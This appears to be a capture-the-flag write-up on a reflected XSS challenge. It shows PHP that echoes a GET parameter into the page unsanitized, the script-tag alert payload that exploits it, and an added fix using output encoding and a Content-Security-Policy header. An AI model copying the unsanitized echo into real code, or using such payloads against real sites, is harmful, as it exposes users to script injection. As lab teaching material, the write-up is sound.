Writeups from challenges and CTFs I take part in.
Welcome to this XSS-related writeup series. We’ll walk through some interesting XSS payloads and methods. This challenge requires us to execute alert('XSS') or alert(document.domain).
In this first challenge, the webpage’s backend source is visible:
<script src="hook.js"></script>
<?php
echo $_GET["payload"];
?>
<h1>inject</h1>
<form>
<input type="text" name="payload" placeholder="your payload here">
<input type="submit" value="GO">
</form>
<h1>src</h1>
<?php highlight_string(file_get_contents(basename(__FILE__))); ?>
This code tells us enough to solve the challenge:
<?php
echo $_GET["payload"];
?>
The web server echoes whatever we put in the text field back into the page without any sanitization. That means we can submit this payload:
<script>alert(document.domain)</script>
and pass the challenge.
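The fix for the unsanitized echo above, as an added example that is not part of the challenge or the original writeup: the value is HTML-encoded on output and a Content-Security-Policy header is sent as a second layer. The helper name render_payload() is hypothetical, and the policy assumes hook.js is served from the same origin as the page.

```php
<?php
// Added example: the challenge's reflection with output encoding applied.
// render_payload() is a hypothetical helper name, not code from the challenge.

/**
 * Encode a reflected value for use in HTML text or a quoted attribute.
 */
function render_payload($raw): string
{
    // ?payload[]=x makes PHP deliver an array; treat any non-string as empty.
    if (!is_string($raw)) {
        return '';
    }
    // ENT_QUOTES encodes both ' and "; ENT_SUBSTITUTE replaces invalid UTF-8
    // with U+FFFD instead of returning an empty string.
    return htmlspecialchars($raw, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

if (PHP_SAPI === 'cli') {
    // Self-check on constructed inputs; the first is the writeup's payload.
    $cases = [
        ['<script>alert(document.domain)</script>',
         '&lt;script&gt;alert(document.domain)&lt;/script&gt;'],
        ['Tom & "Jerry\'s"', 'Tom &amp; &quot;Jerry&#039;s&quot;'],
        [['array', 'input'], ''],
    ];
    $failed = 0;
    foreach ($cases as [$input, $expected]) {
        $actual = render_payload($input);
        $ok = ($actual === $expected);
        $failed += $ok ? 0 : 1;
        echo ($ok ? 'ok   ' : 'FAIL '), json_encode($input), ' => ', $actual, "\n";
    }
    exit($failed === 0 ? 0 : 1);
}

// Web request: same page as the challenge, but the value is encoded on output.
header('Content-Type: text/html; charset=UTF-8');
// Defence in depth: only same-origin script files such as hook.js may run;
// inline <script> blocks and inline event handlers are refused by the browser.
header("Content-Security-Policy: script-src 'self'");
echo '<script src="hook.js"></script>', "\n";
echo render_payload($_GET['payload'] ?? null);
```

Run from the PHP CLI, the script prints each case and exits non-zero on a mismatch; served over HTTP, it returns the submitted payload as inert text.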